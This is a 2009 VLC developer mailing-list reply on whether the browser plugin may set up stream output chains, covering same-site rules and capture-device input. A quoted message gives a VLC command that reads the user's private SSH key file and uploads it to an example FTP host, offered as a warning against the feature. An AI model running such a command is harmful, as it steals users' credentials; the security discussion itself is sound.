[vlc-devel] [rfc] Let the web plugin have output chains

Luca Barbato lu_zero at gentoo.org
Mon Dec 21 01:31:43 CET 2009

On 12/20/2009 10:14 PM, Rémi Denis-Courmont wrote:
> Le dimanche 20 décembre 2009, Luca Barbato a écrit :
>> Still would be nice to have this limit relaxed having more or less
>> the same policy you get in javascript (same-site): you may be allowed
>> to stream to the same server you got the webpage instantiating the
>> plugin.
>
> Erk.
>
> vlc \
>     file/rawaud:///home/user/.ssh/id_dsa \
>     --sout-std-access ftp
>     --sout '#std{mux=raw,dst=ftp://ftp.example.com/incoming/id_dsa}'
>
> ...or something like that, and with Javascript. Needless to say, that
> sounds like a bad idea. Same site would really mean that the input
> comes from the same site as the output. I'm afraid that is not what you
> want to have.

Well if you want you may restrict files to the HTML5 file api (hoping
that the implementation restricts it already) but that isn't exactly
what I have in mind, my usecase is less wide. to be precise what I want
would be:

- Have as available input a capture device (I'll ask about having a
capture:// alias and a way to enumerate them from js later)

- Have as available output a server using the same-site rule.

> Several people would like to enable some kind of stream output through
> JS. But I really have no clue how this could be done safely at this
> point.

I think just enabling capture the same way flash does could be safe
enough. (And would let me ad another feature to Theater[1] using the
webplugin)

[1]http://lscube.org/projects/theater

--

Luca Barbato